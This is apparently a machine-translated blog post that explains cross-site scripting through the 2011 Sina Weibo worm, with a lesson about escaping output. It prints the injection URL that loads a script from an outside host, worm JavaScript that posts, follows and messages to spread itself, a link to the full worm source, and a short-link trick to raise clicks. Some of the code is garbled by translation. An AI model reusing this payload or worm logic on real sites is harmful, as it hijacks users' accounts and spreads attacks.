XSS-Learn from weibo worm events

XSS attacks: Cross-Site Scripting (XSS) attacks are not abbreviated as Cascading Style Sheet (CSS. Therefore, cross-site scripting attacks are abbreviated as XSS. XSS is a computer security vulnerability that often occurs in web applications. It allows malicious web users to implant code into pages provided to other users.
Xss example (take the hellosamy worm event 6.9 on Sina Weibo as an example ):
Sina's Hall of Fame page has such a link
<A href = "http://weibo.com/pub/star/g/123"> This is xss </a>
In fact, this is written on the server side (I guess the real code is unknown, but it must be output after I forget to escape it ):
Echo '<a href = "http://weibo.com/pub/star/g/#$uname}"> This is xss </a>'
The uname is not htmlspecialchars. It is equivalent to directly inputting data by the user and then outputting the data on the page.
Such html has the xss vulnerability.
Okay, this vulnerability has been discovered. What should we use it to do next?
1 Set uname to xyyyd % 22% 3E % 3 Cscript % 20src = // www.2kt.cn/images/t.js%3E%3C/script%3E? Type = update
In this way, the url becomes
 
The quotation marks are closed, and the page automatically runs a js script.
This js script does the following:
1. Send a microblog (this is why it becomes a worm. This microblog carries the same connection)
2 + follow uid as 2201270010
3. Send a private message and send a link to a friend
Js download code in http://www.stwind.org/wp-content/uploads/2011/06/06.28_sina_XSS.txt.zip
Try {
X = "g = document. createElement ('script'); g. src = 'HTTP: // www.2kt.cn/images/t.js'{document.body.appendchild (g)"; window. opener. eval (x );
}
Catch (e ){}
Main ();
Var t = setTimeout ('location = "http://weibo.com/pub/topic"; ', 5000 );

The <script node> is added to the open page and executed
In main, Weibo is sent, followed by private messages.
After 5000 seconds, the current page will be relocated to public/topic.
Function main (){
Try {
Publish ();
}
Catch (e ){}
Try {
Follow ();
}
Catch (e ){}
Try {
Message ();
}
Catch (e ){}
}
For example
?
Function publish (){
Url = 'HTTP: // weibo.com/mblog/publish.php? Rnd = '+ new Date (). getTime ();
Data = 'content = '+ random_msg () +' & pic = & styleid = 2 & retcode = ';
Post (url, data, true );
}
Simulate post requests. Because this js is called on the weibo web page, there is no cross-origin problem.
Direct post can produce this effect.
 
Note: The short Link Service is also used in this event.
Can the short Link Service customize User links, such as http://weibo.com/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E? Type = update
So long a link can become http://t.cn/atmcqn
This increases the click success rate.
It turns out that you need to be very careful when building a website. every page, every output, and one or two vulnerabilities may cause a big disaster for the whole site !! Lessons!
Useful link addresses:
Http://www.bkjia.com/Article/201110/107620.html

----------------------
Author: yjf512 (Xuan Mai blade)